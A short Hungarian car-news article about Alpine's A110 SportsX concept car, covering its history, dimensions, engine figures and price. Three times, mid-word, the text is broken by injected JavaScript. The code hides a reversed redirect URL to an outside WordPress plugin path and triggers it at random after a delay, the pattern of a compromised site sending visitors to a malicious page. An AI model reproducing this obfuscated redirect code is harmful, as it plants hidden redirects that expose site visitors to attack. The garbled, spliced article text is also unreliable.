Márkanapja alkalmából mutatta be legújabb gondolatébresztő tanulmányautóját az Alpine. A Renault-csoporthoz tartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozó egzotikus sportautó-gyártó az A110 raliverziójából indul ki, így szélesebb és magasabb az alapmodellnél. Történelmi előzménye is van az autónak: 1973-ban egy A110 (természetesen az akkori széria, nem az új) nyerte meg a Monte Carlo ralit. A modern utód 80 mm-rel szélesebb a normál verziónál, hasmagasságát 60 mm-rel emelték meg. Műszakilag nem váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozik az autó: 1,8 literes motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja 252 lóerős, a nyomatéki csúcs 320 Nm. Az A110 – legalábbis normál hasmagassággal – 6,2 mp alatt gyorsul 100 km/órára, végsebessége 250 km/óra, vételára nagyságrendileg 18 millió forint. A SportsX gyártásáról…
- Hirdetés -